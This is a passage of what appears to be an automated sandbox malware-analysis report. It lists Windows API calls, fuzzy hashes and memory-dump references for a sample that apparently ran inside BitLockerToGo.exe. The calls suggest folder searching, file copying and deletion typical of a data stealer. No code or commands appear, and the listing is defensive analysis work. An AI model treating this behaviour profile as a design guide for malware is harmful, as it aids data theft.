                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300B16A
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300B17E
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2500673778-0
                                                                                                                                                                • Opcode ID: db1c37218b7c1978556d78c04299176e116a62848eb8622d030cad7f0f49f6d3
                                                                                                                                                                • Instruction ID: 6ade80e7c2dda5d02416b99aa9397bac71325473929ea29685d13fbdffa6281f
                                                                                                                                                                • Opcode Fuzzy Hash: db1c37218b7c1978556d78c04299176e116a62848eb8622d030cad7f0f49f6d3
                                                                                                                                                                • Instruction Fuzzy Hash: C491247AA132189BDF04FBA0DD94DEE7339AF94210F404169F507AB090EF746A59CBB0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300B42E
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300B442
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2500673778-0
                                                                                                                                                                • Opcode ID: 4e7b344be8ccab07724430bfe5763e51530d524573b47c2c3f5b32b4734418b6
                                                                                                                                                                • Instruction ID: e3f707ae57c16a1ff9cf5ce2469b6e9eb92ac3fc629249934dbfd17d4bb5fa2f
                                                                                                                                                                • Opcode Fuzzy Hash: 4e7b344be8ccab07724430bfe5763e51530d524573b47c2c3f5b32b4734418b6
                                                                                                                                                                • Instruction Fuzzy Hash: 2571337AA132189BDF04FBA0DD94DEE7379BF94210F404519F507AB090EF74AA59CBA0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 03018DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 03018E0B
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03014BEA
                                                                                                                                                                • lstrcat.KERNEL32(?,035558D0), ref: 03014C08
                                                                                                                                                                  • Part of subcall function 03014910: wsprintfA.USER32 ref: 0301492C
                                                                                                                                                                  • Part of subcall function 03014910: FindFirstFileA.KERNEL32(?,?), ref: 03014943
                                                                                                                                                                  • Part of subcall function 03014910: StrCmpCA.SHLWAPI(?,03020FDC), ref: 03014971
                                                                                                                                                                  • Part of subcall function 03014910: StrCmpCA.SHLWAPI(?,03020FE0), ref: 03014987
                                                                                                                                                                  • Part of subcall function 03014910: FindNextFileA.KERNEL32(000000FF,?), ref: 03014B7D
                                                                                                                                                                  • Part of subcall function 03014910: FindClose.KERNEL32(000000FF), ref: 03014B92
                                                                                                                                                                  • Part of subcall function 03014910: wsprintfA.USER32 ref: 030149B0
                                                                                                                                                                  • Part of subcall function 03014910: StrCmpCA.SHLWAPI(?,030208D2), ref: 030149C5
                                                                                                                                                                  • Part of subcall function 03014910: wsprintfA.USER32 ref: 030149E2
                                                                                                                                                                  • Part of subcall function 03014910: PathMatchSpecA.SHLWAPI(?,?), ref: 03014A1E
                                                                                                                                                                  • Part of subcall function 03014910: lstrcat.KERNEL32(?,03554CD0), ref: 03014A4A
                                                                                                                                                                  • Part of subcall function 03014910: lstrcat.KERNEL32(?,03020FF8), ref: 03014A5C
                                                                                                                                                                  • Part of subcall function 03014910: lstrcat.KERNEL32(?,?), ref: 03014A70
                                                                                                                                                                  • Part of subcall function 03014910: lstrcat.KERNEL32(?,03020FFC), ref: 03014A82
                                                                                                                                                                  • Part of subcall function 03014910: lstrcat.KERNEL32(?,?), ref: 03014A96
                                                                                                                                                                  • Part of subcall function 03014910: CopyFileA.KERNEL32(?,?,00000001), ref: 03014AAC
                                                                                                                                                                  • Part of subcall function 03014910: DeleteFileA.KERNEL32(?), ref: 03014B31
                                                                                                                                                                  • Part of subcall function 03014910: wsprintfA.USER32 ref: 03014A07
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2104210347-0
                                                                                                                                                                • Opcode ID: 7e852461351954664f9cbc8d41ee0c64f31ea5982f2a673878d18a2f7f069ee6
                                                                                                                                                                • Instruction ID: e32b42e5102985ffbdf6a9527689d5a33e97849fe329f15a92462801a2dc8b32
                                                                                                                                                                • Opcode Fuzzy Hash: 7e852461351954664f9cbc8d41ee0c64f31ea5982f2a673878d18a2f7f069ee6
                                                                                                                                                                • Instruction Fuzzy Hash: 9741C5BFA01304ABD754FBA0FC45EEE373DA784700F00C508B94A5A189FE715B988B91
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNEL32(03006DBE,03006DBE,00003000,00000040), ref: 03006706
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,03006DBE,00003000,00000040), ref: 03006753
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                • Opcode ID: af76547fbef54db95eb77f0e9735f7ce42bf82012aeba68bf17c9440653ca1d1
                                                                                                                                                                • Instruction ID: 3d9de8a7a22aec5571e15d10a7d56402b80e161fc467c36ddb4a53b2a4c45518
                                                                                                                                                                • Opcode Fuzzy Hash: af76547fbef54db95eb77f0e9735f7ce42bf82012aeba68bf17c9440653ca1d1
                                                                                                                                                                • Instruction Fuzzy Hash: 5141C974A01209EFDB44CF58C494BADBBB2FF44314F148699E9599B385C732AA91CF84
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 03018DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 03018E0B
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0301508A
                                                                                                                                                                • lstrcat.KERNEL32(?,035562B8), ref: 030150A8
                                                                                                                                                                  • Part of subcall function 03014910: wsprintfA.USER32 ref: 0301492C
                                                                                                                                                                  • Part of subcall function 03014910: FindFirstFileA.KERNEL32(?,?), ref: 03014943
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2699682494-0
                                                                                                                                                                • Opcode ID: 65a6763b1893356844f8e53f8399f15d5be6d6ecec852ca5bdf8c5249f3daa21
                                                                                                                                                                • Instruction ID: ea40ced690d80287bdb80b84e6e6b47687fb05e0f95fefe8da5f38317330b37a
                                                                                                                                                                • Opcode Fuzzy Hash: 65a6763b1893356844f8e53f8399f15d5be6d6ecec852ca5bdf8c5249f3daa21
                                                                                                                                                                • Instruction Fuzzy Hash: A501B97E941308A7DB54FBB0EC45EDE733CAB94700F008548B6495A184EF709BD98BE1
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0300114E,?,?,03016A1C), ref: 030010B3
                                                                                                                                                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0300114E,?,?,03016A1C), ref: 030010F7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2087232378-0
                                                                                                                                                                • Opcode ID: ddea72b1fba015e6116bee463e87dff8438e9dfc578f0fe217d02666f7775e32
                                                                                                                                                                • Instruction ID: 98e9fb7fba78baa96df9cf5ffcdd829a5adb3f6e956d02cd71c7fbdf7f5c3917
                                                                                                                                                                • Opcode Fuzzy Hash: ddea72b1fba015e6116bee463e87dff8438e9dfc578f0fe217d02666f7775e32
                                                                                                                                                                • Instruction Fuzzy Hash: A0F0E275682308BBE714EAA8AD49FAEB7E8E705B15F304448F544E7280D6719F00CAA0
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,03010117,?,00000000,?,00000000,03020DAB,03020DAA), ref: 03018D9F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: d21e27dd734f74a3f59a33c62b96219356324016317a73eae0dbdc7faf7b84bf
                                                                                                                                                                • Instruction ID: a7cef20c3da73019188dfe40672954bfe3beca20940ff6ee154e6c913550ab46
                                                                                                                                                                • Opcode Fuzzy Hash: d21e27dd734f74a3f59a33c62b96219356324016317a73eae0dbdc7faf7b84bf
                                                                                                                                                                • Instruction Fuzzy Hash: C3F01575D02308EBCB00EFA4D5486DCBB74EB01320F008199D8266B280DB756B6ACB80
                                                                                                                                                                APIs
                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 03018E0B
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
